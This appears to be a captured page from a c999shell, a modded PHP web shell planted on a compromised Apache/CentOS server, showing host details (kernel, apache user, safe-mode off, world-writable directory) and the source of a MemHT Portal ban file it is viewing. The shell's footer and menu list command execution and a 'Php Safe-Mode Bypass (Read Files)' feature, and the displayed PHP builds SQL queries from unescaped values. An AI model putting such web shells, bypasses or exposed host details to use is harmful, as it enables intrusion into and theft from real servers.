Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/alumni/inc/ drwxrwxrwx |
Viewing file: inc_ban.php (3.95 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <?php /******************************************************************************** - MemHT Portal - Copyright (C) 2007-2008 by Miltenovik Manojlo http://www.memht.com This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your opinion) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2) or write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA02110-1301, USA. ********************************************************************************/ if (stristr(htmlentities($_SERVER['PHP_SELF']), "inc_ban.php")) { die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>"); } checkUser(); //Check and reban if the banned user has changed his ip address if (banned()) { showScreen(); exit; } function banned($ip="") { global $dblink,$visitorInfo; $ip = ($ip=="") ? ip2num($visitorInfo['ip']) : ip2num($ip) ; return ($dblink->get_num("SELECT ip FROM memht_banned WHERE ip='$ip' OR (range=1 AND '$ip' BETWEEN ip AND fip)")>0) ? true : false ; } function checkUser() { global $dblink,$siteConfig,$visitorInfo,$userid,$userInfo,$tzNOW; if (isUser($userid) AND $dblink->get_num("SELECT id FROM memht_banned WHERE user='".$userInfo['user']."' AND ((range=0 AND ip!='".ip2num($visitorInfo['ip'])."') OR (range=1 AND '".ip2num($visitorInfo['ip'])."' NOT BETWEEN ip AND fip))")>0) { //Get id of the first ban $row = $dblink->get_row("SELECT id FROM memht_banned WHERE user='".$userInfo['user']."' ORDER BY id ASC LIMIT 1"); $first = intval($row['id']); //Ban the new ip address $row = $dblink->get_row("SELECT *,DATE_FORMAT(date, '".$siteConfig['timestamp']."') as date,DATE_FORMAT(bandate, '".$siteConfig['timestamp']."') as bandate FROM memht_banned WHERE user='".$userInfo['user']."' AND id=$first"); $old_ip = $row['ip']; $old_fip = $row['fip']; $old_range = intval($row['range']); $old_permanent = intval($row['permanent']); $old_date = $row['date']; $old_reason = outCode($row['reason']); $old_author = outCode($row['author']); $old_bandate = $row['bandate']; $new_author = "Ban system"; $new_reason = "User ".$userInfo['user']." rebanned (automatically) with the new ip address! Original ban info: "; if ($old_range==0) { $new_reason .= "IP: ".num2ip($old_ip); } else { $new_reason .= "Range: from $old_ip to $old_fip"; } if ($old_permanent==1) { $new_reason .= " Permanently"; } else { $new_reason .= " Until: $old_date"; } $new_reason .= " by $old_author on $old_bandate"; if ($dblink->get_num("SELECT id FROM memht_banned WHERE ip='".ip2num($visitorInfo['ip'])."'")==0) { $dblink->query("INSERT INTO memht_banned (id,ip,user,permanent,date,reason,author,bandate) VALUES(null,'".ip2num($visitorInfo['ip'])."','$user','$old_permanent','$old_date','$new_reason','$new_author',$tzNOW)"); } } } function showScreen() { global $siteConfig,$visitorInfo; echo "<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td align='center'>\n"; echo "<div><b>You were banned from ".$siteConfig['site_name']."</b></div><br>\n"; echo "<div>If you think your ban is unjust, send an email on ".maskEmail($siteConfig['webmaster_mail'])."</div>\n"; echo "</td></tr></table>\n"; } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]-- |